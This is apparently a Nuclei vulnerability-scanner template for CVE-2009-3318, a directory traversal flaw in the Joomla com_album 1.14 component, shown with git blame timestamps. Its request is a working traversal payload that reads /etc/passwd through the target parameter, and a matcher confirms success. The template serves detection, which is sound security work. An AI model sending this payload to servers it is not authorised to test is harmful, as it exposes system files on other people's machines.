nuclei-templates/cves/2009/CVE-2009-3318.yaml

27 lines
832 B
YAML
Raw Normal View History

2021-09-27 11:02:48 +00:00
id: CVE-2009-3318
info:
name: Joomla! Component com_album 1.14 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
2021-09-27 13:06:48 +00:00
reference:
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
2021-09-27 13:06:48 +00:00
tags: cve,cve2009,joomla,lfi
2021-09-27 11:02:48 +00:00
requests:
- method: GET
path:
2021-09-27 13:06:48 +00:00
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
2021-09-27 11:02:48 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200